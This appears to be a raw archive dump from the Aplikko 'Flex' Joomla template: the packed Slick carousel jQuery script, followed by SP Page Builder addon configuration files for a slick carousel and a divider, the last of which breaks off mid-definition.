0!==e.4w&&(i.Z="4w",i.25="-46-2c",i.1G="62",D 0===e.4w&&(i.Z=!1)),D 0!==e.2c&&!1!==i.Z&&(i.Z="2c",i.25="2c",i.1G="7M"),i.3k=i.6.4V&&u!==i.Z&&!1!==i.Z},e.b.2X=8(i){f e,t,o,s,n=9;A(t=n.$p.U(".7-B").R("7-1e 7-32 7-3D").m("z-N","1x"),n.$q.K(i).C("7-3D"),!0===n.6.X){f r=n.6.g%2==0?1:0;e=E.2b(n.6.g/2),!0===n.6.Y&&(i>=e&&i<=n.h-1-e?n.$q.1M(i-e+r,i+e+1).C("7-1e").m("z-N","1l"):(o=n.6.g+i,t.1M(o-e+1+r,o+e+2).C("7-1e").m("z-N","1l")),0===i?t.K(t.V-1-n.6.g).C("7-32"):i===n.h-1&&t.K(n.6.g).C("7-32")),n.$q.K(i).C("7-32")}1g i>=0&&i<=n.h-n.6.g?n.$q.1M(i,i+n.6.g).C("7-1e").m("z-N","1l"):t.V<=n.6.g?t.C("7-1e").m("z-N","1l"):(s=n.h%n.6.g,o=!0===n.6.Y?n.6.g+i:i,n.6.g==n.6.y&&n.h-i<n.6.g?t.1M(o-(n.6.g-s),o+s).C("7-1e").m("z-N","1l"):t.1M(o,o+n.6.g).C("7-1e").m("z-N","1l"));"4O"!==n.6.20&&"5Q"!==n.6.20||n.20()},e.b.49=8(){f e,t,o,s=9;A(!0===s.6.19&&(s.6.X=!1),!0===s.6.Y&&!1===s.6.19&&(t=u,s.h>s.6.g)){11(o=!0===s.6.X?s.6.g+1:s.6.g,e=s.h;e>s.h-o;e-=1)t=e-1,i(s.$q[t]).67(!0).m("2x","").m("x-7-14",t-s.h).3X(s.$k).C("7-1C");11(e=0;e<o+s.h;e+=1)t=e,i(s.$q[t]).67(!0).m("2x","").m("x-7-14",t+s.h).1Q(s.$k).C("7-1C");s.$k.U(".7-1C").U("[2x]").1u(8(){i(9).m("2x","")})}},e.b.1K=8(i){f e=9;i||e.1H(),e.1P=i},e.b.2n=8(e){f t=9,o=i(e.3G).3z(".7-B")?i(e.3G):i(e.3G).7N(".7-B"),s=5z(o.m("x-7-14"));s||(s=0),t.h<=t.6.g?t.1A(s,!1,!0):t.1A(s)},e.b.1A=8(i,e,t){f o,s,n,r,l,d=u,a=9;A(e=e||!1,!(!0===a.2G&&!0===a.6.4W||!0===a.6.19&&a.j===i))A(!1===e&&a.2f(i),o=i,d=a.33(o),r=a.33(a.j),a.2I=u===a.1z?r:a.1z,!1===a.6.Y&&!1===a.6.X&&(i<0||i>a.3u()*a.6.y))!1===a.6.19&&(o=a.j,!0!==t?a.3p(r,8(){a.1N(o)}):a.1N(o));1g A(!1===a.6.Y&&!0===a.6.X&&(i<0||i>a.h-a.6.y))!1===a.6.19&&(o=a.j,!0!==t?a.3p(r,8(){a.1N(o)}):a.1N(o));1g{A(a.6.1Y&&56(a.2H),s=o<0?a.h%a.6.y!=0?a.h-a.h%a.6.y:a.h+o:o>=a.h?a.h%a.6.y!=0?0:o-a.h:o,a.2G=!0,a.$p.16("7O",[a,a.j,s]),n=a.j,a.j=s,a.2X(a.j),a.6.2f&&(l=(l=a.42()).7("44")).h<=l.6.g&&l.2X(a.j),a.2W(),a.3E(),!0===a.6.19)M!0!==t?(a.5w(n),a.5v(s,8(){a.1N(s)})):a.1N(s),D a.3Y();!0!==t?a.3p(d,8(){a.1N(s)}):a.1N(s)}},e.b.5A=8(){f i=9;!0===i.6.1W&&i.h>i.6.g&&(i.$G.4x(),i.$H.4x()),!0===i.6.I&&i.h>i.6.g&&i.$I.4x(),i.$p.C("7-28")},e.b.3H=8(){f i,e,t,o,s=9;M i=s.v.3c-s.v.2d,e=s.v.3I-s.v.3d,t=E.7P(e,i),(o=E.4y(7Q*t/E.7R))<0&&(o=68-E.5y(o)),o<=45&&o>=0?!1===s.6.1b?"1I":"2z":o<=68&&o>=7S?!1===s.6.1b?"1I":"2z":o>=69&&o<=7T?!1===s.6.1b?"2z":"1I":!0===s.6.22?o>=35&&o<=69?"6a":"6b":"12"},e.b.6c=8(i){f e,t,o=9;A(o.3i=!1,o.3j=!1,o.2K)M o.2K=!1,!1;A(o.1P=!1,o.3U=!(o.v.2e>10),D 0===o.v.2d)M!1;A(!0===o.v.4z&&o.$p.16("7U",[o,o.3H()]),o.v.2e>=o.v.4A){4d(t=o.3H()){1E"1I":1E"6a":e=o.6.2E?o.3A(o.j+o.36()):o.j+o.36(),o.3S=0;2a;1E"2z":1E"6b":e=o.6.2E?o.3A(o.j-o.36()):o.j-o.36(),o.3S=1}"12"!=t&&(o.1A(e),o.v={},o.$p.16("3h",[o,t]))}1g o.v.3c!==o.v.2d&&(o.1A(o.j),o.v={})},e.b.1r=8(i){f e=9;A(!(!1===e.6.3h||"7V"2Z 1k&&!1===e.6.3h||!1===e.6.2g&&-1!==i.1F.5D("7W")))4d(e.v.6d=i.1O&&D 0!==i.1O.3e?i.1O.3e.V:1,e.v.4A=e.2h/e.6.3Q,!0===e.6.22&&(e.v.4A=e.3T/e.6.3Q),i.x.3a){1E"5G":e.6e(i);2a;1E"5H":e.6f(i);2a;1E"38":e.6c(i)}},e.b.6f=8(i){f e,t,o,s,n,r,l=9;M n=D 0!==i.1O?i.1O.3e:u,!(!l.3i||l.2K||n&&1!==n.V)&&(e=l.33(l.j),l.v.2d=D 0!==n?n[0].6g:i.6h,l.v.3d=D 0!==n?n[0].6i:i.6j,l.v.2e=E.4y(E.6k(E.6l(l.v.2d-l.v.3c,2))),r=E.4y(E.6k(E.6l(l.v.3d-l.v.3I,2))),!l.6.22&&!l.3j&&r>4?(l.2K=!0,!1):(!0===l.6.22&&(l.v.2e=r),t=l.3H(),D 0!==i.1O&&l.v.2e>4&&(l.3j=!0,i.29()),s=(!1===l.6.1b?1:-1)*(l.v.2d>l.v.3c?1:-1),!0===l.6.22&&(s=l.v.3d>l.v.3I?1:-1),o=l.v.2e,l.v.4z=!1,!1===l.6.Y&&(0===l.j&&"2z"===t||l.j>=l.3u()&&"1I"===t)&&(o=l.v.2e*l.6.4M,l.v.4z=!0),!1===l.6.12?l.1z=e+o*s:l.1z=e+o*(l.$F.2q()/l.2h)*s,!0===l.6.22&&(l.1z=e+o*s),!0!==l.6.19&&!1!==l.6.4T&&(!0===l.2G?(l.1z=u,!1):D l.4u(l.1z))))},e.b.6e=8(i){f e,t=9;A(t.1P=!0,1!==t.v.6d||t.h<=t.6.g)M t.v={},!1;D 0!==i.1O&&D 0!==i.1O.3e&&(e=i.1O.3e[0]),t.v.3c=t.v.2d=D 0!==e?e.6g:i.6h,t.v.3I=t.v.3d=D 0!==e?e.6i:i.6j,t.3i=!0},e.b.7X=e.b.7Y=8(){f i=9;u!==i.$24&&(i.2o(),i.$k.J(9.6.B).1R(),i.$24.1Q(i.$k),i.2p())},e.b.2o=8(){f e=9;i(".7-1C",e.$p).1L(),e.$I&&e.$I.1L(),e.$G&&e.26.2t(e.6.G)&&e.$G.1L(),e.$H&&e.26.2t(e.6.H)&&e.$H.1L(),e.$q.R("7-B 7-1e 7-5u 7-3D").m("z-N","1x").O("15","")},e.b.2u=8(i){f e=9;e.$p.16("2u",[e,i]),e.3C()},e.b.3E=8(){f i=9;E.2b(i.6.g/2),!0===i.6.1W&&i.h>i.6.g&&!i.6.Y&&(i.$G.R("7-Q").m("z-Q","1l"),i.$H.R("7-Q").m("z-Q","1l"),0===i.j?(i.$G.C("7-Q").m("z-Q","1x"),i.$H.R("7-Q").m("z-Q","1l")):i.j>=i.h-i.6.g&&!1===i.6.X?(i.$H.C("7-Q").m("z-Q","1x"),i.$G.R("7-Q").m("z-Q","1l")):i.j>=i.h-1&&!0===i.6.X&&(i.$H.C("7-Q").m("z-Q","1x"),i.$G.R("7-Q").m("z-Q","1l")))},e.b.2W=8(){f i=9;u!==i.$I&&(i.$I.U("1B").R("7-1e").38(),i.$I.U("1B").K(E.2b(i.j/i.6.y)).C("7-1e"))},e.b.4g=8(){f i=9;i.6.1Y&&(1k[i.N]?i.1P=!0:i.1P=!1)},i.7Z.7=8(){f i,t,o=9,s=1o[0],n=80.b.1M.2R(1o,1),r=o.V;11(i=0;i<r;i++)A("43"==1y s||D 0===s?o[i].7=81 e(o[i],s):t=o[i].7[s].82(o[i].7,n),D 0!==t)M t;M o}});',62,499,'||||||options|slick|function|this||prototype||||var|slidesToShow|slideCount||currentSlide|slideTrack||attr|||slider|slides||||null|touchObject||data|slidesToScroll|aria|if|slide|addClass|void|Math|list|prevArrow|nextArrow|dots|children|eq|off|return|hidden|css|on|disabled|removeClass|proxy|zIndex|find|length||centerMode|infinite|animType||for|vertical|slideWidth|index|width|trigger|window|changeSlide|fade|responsive|rtl|breakpoints|setPosition|active|tabindex|else|click|button|slideOffset|document|false|ceil|opacity|arguments|accessibility|speed|swipeHandler|keyHandler|instanceUid|each|0px|removeAttr|true|typeof|swipeLeft|slideHandler|li|cloned|message|case|type|transitionType|autoPlay|left|lazy|interrupt|remove|slice|postSlide|originalEvent|interrupted|appendTo|detach|animate|first|keydown|sizes|arrows|next|autoplay|easing|lazyLoad|respondTo|verticalSwiping|activeBreakpoint|slidesCache|transformType|htmlExpr|append|loading|preventDefault|break|floor|transform|curX|swipeLength|asNavFor|draggable|listWidth|breakpointSettings|cssTransitions|paused|positionProp|autoPlayClear|selectHandler|unload|reinit|height|top|px|test|unslick|focus|mouseleave|id|srcset|right|class|initialSlide|rows|slidesPerRow|swipeToSlide|variableWidth|animating|autoPlayTimer|currentLeft|direction|scrolling|unslicked|extend|visibilityChange|originalSettings|clickHandler|outerHeight|call|setTimeout|div|img|src|updateDots|setSlideClasses|checkResponsive|in|previous|resize|center|getLeft|offsetLeft||getSlideCount||end||action|progressiveLazyLoad|startX|curY|touches|adaptiveHeight|focusOnSelect|swipe|dragging|swiping|transformsEnabled|focussed|autoPlayIterator|init|number|animateSlide|applyTransition|not|arrow|add|getDotCount|style|createElement|refresh|breakpoint|is|checkNavigable|mouseenter|destroy|current|updateArrows|role|target|swipeDirection|startY|define|defaults|appendArrows|label|centerPadding|cssEase|mobileFirst|touchThreshold|initials|currentDirection|listHeight|shouldClick|windowWidth|registerBreakpoints|prependTo|animateHeight|translate|translate3d|disableTransition|getNavTarget|object|getSlick||ms|buildArrows|buildDots|setupInfinite|get|appendChild|display|switch|getNavigableIndexes|blur|visibility|cleanUpSlideEvents|orientationChange|initialized|focusHandler|outerWidth|push|setProps|initADA|initArrowEvents|initDotEvents|initSlideEvents|show|array|setCSS|perspectiveProperty|msTransform|hide|round|edgeHit|minSwipe|use|strict|jquery|exports|appendDots|prev|Previous|Next|autoplaySpeed|customPaging|dotsClass|edgeFriction|focusOnChange|ondemand|pauseOnHover|pauseOnFocus|pauseOnDotsHover|500|touchMove|useCSS|useTransform|waitForAnimate|mozHidden|webkitHidden|dragHandler||activateADA|input|select|boolean|animStart|clearInterval|dotted|buildOut|originalStyling|track|parent|buildRows|empty|100|min|hasOwnProperty|cleanUpEvents|touchstart|mousedown|touchmove|mousemove|touchend|mouseup|touchcancel|orientationchange|dragstart|load|cleanUpRows|stopImmediatePropagation|visible|fadeSlide|fadeSlideOut|filter|abs|parseInt|startLoad|loadSlider|initializeEvents|indexOf|control|selected|start|move|initUI|keyCode|onload|lazyLoaded|onerror|lazyload|error|lazyLoadError|anticipated|splice|windowDelay|setDimensions|padding|setFade|position|relative|setHeight|multiple|single|MozTransition|msTransition|OTransform|webkitPerspective|MozTransform|webkitTransform|clone|360|135|down|up|swipeEnd|fingerCount|swipeStart|swipeMove|pageX|clientX|pageY|clientY|sqrt|pow|amd|undefined|module|require|jQuery|Slick|3e3|50px|ease|text|linear|1e3|loadIndex|sliding|animProp|rowCount|visibilitychange|windowTimer|mozvisibilitychange|webkitvisibilitychange|addSlide|slickAdd|insertBefore|insertAfter|duration|step|complete|setInterval|ul|wrapAll|wrap|createDocumentFragment|inline|block|innerWidth|currentTarget|closest|default|stopPropagation|filterSlides|slickFilter|getCurrent|slickCurrentSlide|getOption|slickGetOption|goTo|slickGoTo|hasClass|tabpanel|describedby|tablist|presentation|tab|controls|of|tagName|match|TEXTAREA|INPUT|SELECT|200|max|progressive|slickNext|pause|slickPause|play|slickPlay|afterChange|slickPrev|allImagesLoaded|settings|sort|reInit|clearTimeout|removeSlide|slickRemove|5e3|setOption|slickSetOption|string|body|WebkitTransition|OTransition|moz|MozPerspective|webkit|webkitTransition|transition|parents|beforeChange|atan2|180|PI|315|225|edge|ontouchend|mouse|unfilterSlides|slickUnfilter|fn|Array|new|apply'.split('|'),0,{}))PK!iǠ(1(12flex/sppagebuilder/addons/slick_carousel/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;
SpAddonsConfig::addonConfig(
	array(
		'type'=>'repeatable',
		'addon_name'=>'sp_slick_carousel',
		'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL'),
		'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_DESC'),
		'category'=>'Flex',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

			'separator1'=>array(
				'type'=>'separator', 
				'title'=>JText::_('FLEX_ADDON_SETTINGS')
				),
			'infiniteloop'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_LOOP'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_LOOP_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			    ),
			'lazyloading'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_LAZYLOAD'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_LAZYLOAD_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			    ),
			'slidestoshow'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SHOW'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SHOW_DESC'),
				'placeholder'=>'1',
				'std'=>'1'
				),
			'slidestoscroll'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SCROLL'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SCROLL_DESC'),
				'placeholder'=>'1',
				'std'=>'1'
				),
			'spacing'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SPACE_BETWEEN_IMG'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SPACE_BETWEEN_IMG_DESC'),
				'std'=>0
				),		
			'fade_effect'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_FADE_EFFECT'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_FADE_EFFECT_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>0,
			 ),
			'autoplay'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			),
			'autoplay_pause_onhover'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_STOP_ON_HOVER'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_STOP_ON_HOVER_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			),
			'autoplay_pause_onfocus'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_STOP_ON_FOCUS'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_STOP_ON_FOCUS_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			),
			'autoplay_interval'=>array(
				'type'=>'text', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_AUTOPLAY_INTERVAL'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_AUTOPLAY_INTERVAL_DESC'),
				'placeholder'=>'5000',
				'std'=>5000,
				'depends'=>array(array('autoplay', '=', '1')),
				),	
			
			'speed'=>array(
				'type'=>'text', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_SPEED'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_SPEED_DESC'),
				'placeholder'=>'500',
				'std'=>500
				),
			'arrows'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			    ),
			'arrows_size'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_SIZE'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_SIZE_DESC'),
				'placeholder'=>'44',
				'std'=>44,
				'depends'=>array(array('arrows', '=', '1')),
				),
			'arrows_color'=>array(
				'type'=>'color',
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_COLOR'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_COLOR_DESC'),
				'depends'=>array(array('arrows', '=', '1')),
				),
			'arrows_background_color'=>array(
				'type'=>'color',
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_BACKGROUND_COLOR'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_BACKGROUND_COLOR_DESC'),
				'depends'=>array(array('arrows', '=', '1')),
				),
			'arrows_class'=>array(
				'type'=>'text', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_CLASS'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ARROWS_CLASS_DESC'),
				'std'=>'',
				'depends'=>array(array('arrows', '=', '1')),
				),		
			'counter'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_COUNTER'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_COUNTER_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>0,
				'depends'=>array(array('arrows', '=', '1')),
				),
			'counter_color'=>array(
				'type'=>'color',
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_COUNTER_COLOR'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_COUNTER_COLOR_DESC'),
				'depends'=>array(
							array('arrows', '=', '1'),
							array('counter', '=', '1')
						),
				),
			'dots'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_DOTS'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_DOTS_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			    ),
			'dots_color'=>array(
				'type'=>'color',
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_DOTS_COLOR'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_DOTS_COLOR_DESC'),
				'depends'=>array(array('dots', '=', '1')),
				),
			'autoheight'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOHEIGHT'),
				'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_AUTOHEIGHT_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>1,
			    ),
			'separatorRTL'=>array(
				'type'=>'separator', 
				'title'=>JText::_('FLEX_ADDON_RTL_DIR_SEPARATOR')
				),
			'rtl_support'=>array(
				'type'=>'checkbox', 
				'title'=>JText::_('FLEX_ADDON_RTL_DIR'),
				'desc'=>JText::_('FLEX_ADDON_RTL_DIR_DESC'),
				'values'=>array(
					1=>JText::_('JYES'),
					0=>JText::_('JNO'),
				),
				'std'=>0,
			 ),
					
			'separator2'=>array(
				'type'=>'separator', 
				'title'=>JText::_('FLEX_ADDON_BREAKPOINTS')
				),	
			'breakpoint1'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_BREAKPOINTS_MEDIUM_DEVICES'),
				'desc'=>JText::_('FLEX_ADDON_BREAKPOINTS_MEDIUM_DEVICES_DESC'),
				'placeholder'=>'992',
				'std'=>992
				),
			'slidestoshow_break1'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SHOW'),
				'desc'=>JText::_('FLEX_ADDON_BREAKPOINTS_MEDIUM_DEVICES_SLIDES_TO_SHOW'),
				'placeholder'=>'3',
				'std'=>3
				),
			'breakpoint2'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_BREAKPOINTS_SMALL_DEVICES'),
				'desc'=>JText::_('FLEX_ADDON_BREAKPOINTS_SMALL_DEVICES_DESC'),
				'placeholder'=>'768',
				'std'=>768
				),
			'slidestoshow_break2'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SHOW'),
				'desc'=>JText::_('FLEX_ADDON_BREAKPOINTS_SMALL_DEVICES_SLIDES_TO_SHOW'),
				'placeholder'=>'2',
				'std'=>2
				),
			'breakpoint3'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_BREAKPOINTS_EXTRASMALL_DEVICES'),
				'desc'=>JText::_('FLEX_ADDON_BREAKPOINTS_EXTRASMALL_DEVICES_DESC'),
				'placeholder'=>'480',
				'std'=>480
				),
			'slidestoshow_break3'=>array(
				'type'=>'number', 
				'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SHOW'),
				'desc'=>JText::_('FLEX_ADDON_BREAKPOINTS_EXTRASMALL_DEVICES_SLIDES_TO_SHOW'),
				'placeholder'=>'1',
				'std'=>1
				),
				
			'separator3'=>array(
				'type'=>'separator', 
				'title'=>JText::_('FLEX_ADDON_TITLE')
				),	
			'title'=>array(
				'type'=>'text', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
				'std'=> ''
				),
			'heading_selector'=>array(
				'type'=>'select',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
				'values'=>array(
					'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
					'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
					'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
					'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
					'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
					'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
				),
				'std'=>'h3',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_fontsize'=>array(
				'type'=>'number',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
				'std'=>'',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_fontweight'=>array(
				'type'=>'text',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT_DESC'),
				'std'=>'',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_text_color'=>array(
				'type'=>'color',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
				'depends'=>array(array('title', '!=', '')),
			),

			'title_margin_top'=>array(
				'type'=>'number',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
				'placeholder'=>'10',
				'depends'=>array(array('title', '!=', '')),
			),

			'title_margin_bottom'=>array(
				'type'=>'number',
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
				'placeholder'=>'10',
				'depends'=>array(array('title', '!=', '')),
			),

			'class'=>array(
				'type'=>'text', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
				'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
				'std'=>''
				),
			'separator4'=>array(
				'type'=>'separator', 
				'title'=>JText::_('FLEX_ADDON_IMAGES')
				),

			// Repeatable Items
			'sp_slick_carousel_item'=>array(
				'title'=> 'Slides', 
				'type'=>'repeatable',
				'attr'=>array(
					'item_title'=>array(
						'type'=>'text', 
						'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ITEM_TITLE'),
						'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ITEM_TITLE_DESC'),
						'std'=>'Item 1'
						),
					'thumb'=>array(
						'type'=>'media', 
						'title'=>JText::_('FLEX_ADDON_IMAGE'),
						'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_IMAGE'),
						),	
					'alt_text'=>array(
						'type'=>'text',
						'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ALT_TEXT'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ALT_TEXT_DESC'),
						'std'=>'Image',
						'depends'=>array(
							array('thumb', '!=', ''),
						),
					),
					'thumb_url'=>array(
						'type'=>'text', 
						'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_THUMB_URL'),
						'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_THUMB_URL_DESC'),
						'std'=>''
					),
					'url_target'=>array(
						'type'=>'select',
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_DESC'),
						'values'=>array(
							''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
							'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
						),
						'depends'=>array(
							array('thumb', '!=', ''),
							array('thumb_url', '!=', '')
						),
					),
					'description'=>array(
						'type'=>'editor', 
						'title'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ITEM_DESCRIPTION'),
						'desc'=>JText::_('FLEX_ADDON_SLICK_CAROUSEL_ITEM_DESCRIPTION_DESC'),
						'std'=> ''
						),
					),
				),
			),
		),
	)
);
PK!}�##+flex/sppagebuilder/addons/divider/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_divider',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_DESC'),
		'category'=>'General',
		'attr'=>array(
			'general' => array(
					
				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> '',
				),

				'divider_type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_TYPE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_TYPE_DESC'),
					'values'=> array(
						'border'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_TYPE_BORDER'),
						'image'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_TYPE_IMAGE'),
					),
					'std'=>'border',
				),

				'divider_vertical'=>array(
					'type' => 'checkbox',
